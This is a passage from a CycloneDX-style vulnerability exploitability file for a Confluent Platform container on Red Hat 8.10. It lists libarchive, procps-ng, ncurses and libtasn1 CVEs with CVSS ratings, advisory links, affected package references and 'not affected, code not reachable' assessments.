          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libtasn1@4.13-6.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-1000879",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        476
      ],
      "description": "libarchive version commit 379867ecb330b3a952fb7bfa7bffb7bbd5547205 onwards (release v3.3.0 onwards) contains a CWE-476: NULL Pointer Dereference vulnerability in ACL parser - libarchive/archive_acl.c, archive_acl_from_text_l() that can result in Crash/DoS. This attack appear to be exploitable via the victim must open a specially crafted archive file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1000879"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00055.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/106324"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1000879"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libarchive/+bug/1794909"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105/commits/15bf44fd2c1ad0e3fd87048b3fcc90c4dcff1175"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBOCC2M6YGPZA6US43YK4INPSJZZHRTG/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W645KCLWFDBDGFJHG57WOVXGE62QSIJI/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVXA7PHINVT6DFF6PRLTDTVTXKDLVHNF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000879"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1000879"
        }
      ],
      "published": "2018-12-20T17:29:01+00:00",
      "updated": "2026-06-17T01:33:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-1000880",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        119
      ],
      "description": "libarchive version commit 9693801580c0cf7c70e862d305270a16b52826a7 onwards (release v3.2.0 onwards) contains a CWE-20: Improper Input Validation vulnerability in WARC parser - libarchive/archive_read_support_format_warc.c, _warc_read() that can result in DoS - quasi-infinite run time and disk usage from tiny file. This attack appear to be exploitable via the victim must open a specially crafted WARC file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1000880"
        },
        {
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00055.html"
        },
        {
          "url": "http://www.securityfocus.com/bid/106324"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1000880"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/libarchive/+bug/1794909"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/1105/commits/9c84b7426660c09c18cc349f6d70b5f8168b5680"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CBOCC2M6YGPZA6US43YK4INPSJZZHRTG/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W645KCLWFDBDGFJHG57WOVXGE62QSIJI/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZVXA7PHINVT6DFF6PRLTDTVTXKDLVHNF/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000880"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-3859-1"
        },
        {
          "url": "https://usn.ubuntu.com/3859-1/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1000880"
        },
        {
          "url": "https://www.debian.org/security/2018/dsa-4360"
        }
      ],
      "published": "2018-12-20T17:29:01+00:00",
      "updated": "2026-06-17T01:33:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-1121",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        367,
        362
      ],
      "description": "procps-ng, procps is vulnerable to a process hiding through race condition. Since the kernel's proc_pid_readdir() returns PID entries in ascending numeric order, a process occupying a high PID can use inotify events to determine when the process list is being scanned, and fork/exec to obtain a lower PID, thus avoiding enumeration. An unprivileged attacker can hide a process from procps-ng's utilities by exploiting a race condition in reading /proc/PID entries. This vulnerability affects procps and procps-ng up to version 3.3.15, newer versions might be affected also.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-1121"
        },
        {
          "url": "http://seclists.org/oss-sec/2018/q2/122"
        },
        {
          "url": "http://www.securityfocus.com/bid/104214"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-1121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1121"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1121"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-1121"
        },
        {
          "url": "https://www.exploit-db.com/exploits/44806/"
        },
        {
          "url": "https://www.qualys.com/2018/05/17/procps-ng-audit-report-advisory.txt"
        }
      ],
      "published": "2018-06-13T20:29:00+00:00",
      "updated": "2026-06-17T01:50:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.15-14.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/procps-ng@3.3.15-14.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2018-19211",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In ncurses 6.1, there is a NULL pointer dereference at function _nc_parse_entry in parse_entry.c that will lead to a denial of service attack. The product proceeds to the dereference code path even after a \"dubious character `*' in name or alias field\" detection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-19211"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-19211"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1643754"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19211"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-5477-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-19211"
        }
      ],
      "published": "2018-11-12T19:29:00+00:00",
      "updated": "2026-07-23T18:58:25+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "6.1-10.20180224.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/ncurses-libs@6.1-10.20180224.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/ncurses-base@6.1-10.20180224.el8?arch=noarch&distro=redhat-8.10"
        },
        {
